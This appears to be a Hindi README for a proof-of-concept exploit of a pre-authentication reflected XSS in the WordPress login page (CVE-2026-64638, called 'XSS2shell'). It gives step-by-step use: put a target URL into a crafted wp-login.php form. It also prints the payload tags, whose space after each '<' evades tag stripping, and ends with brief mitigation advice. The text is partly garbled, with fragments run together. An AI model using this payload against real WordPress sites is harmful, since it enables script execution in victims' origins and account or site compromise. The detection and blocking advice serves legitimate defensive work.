
CVE-2026-64638 (XSS2shell) POC.
WordPress प्री-ऑथ रिफ्लेक्टेड XSS प्रूफ ऑफ कॉन्सेप्ट
WordPress Core में CVE-2026-64638 (XSS2Shell) पार्सर-डिफरेंशियल XSS के लिए सिंगल-फ़ाइल HTML प्रूफ ऑफ कॉन्सेप्ट। एक क्राफ्टेड लॉगिन अनुरोध के माध्यम से WordPress ओरिजिन में बिना प्रमाणीकरण के JavaScript निष्पादन प्रदर्शित करता है।
strip_tags() बनाम wp_kses_post())POC.html को टेक्स्ट एडिटर में खोलें।action में http://TARGET/wp-login.php को अपने टारगेट से बदलें।<form id="poc" method="post" action="http://TARGET/wp-login.php">
confirm() (या alert()) पॉपअप दिखाई देता है।< area id=ajaxurl href=/?rest_route=/&_method=GET&_jsonp=confirm&_envelope=1>
< div id=color-picker class=reset-pass-submit>
< button class="wp-generate-pw color-option">X
प्रत्येक < के बाद की स्पेस ही एक्सप्लॉइट है। इसके बिना, wp_strip_all_tags() सब कुछ हटा देता है।
log फ़ील्ड में %3C + व्हाइटस्पेस पैटर्न ब्लॉक करें।POST /wp-login.php अनुरोधों पर निगरानी रखें जहाँ log में एन्कोडेड < हो।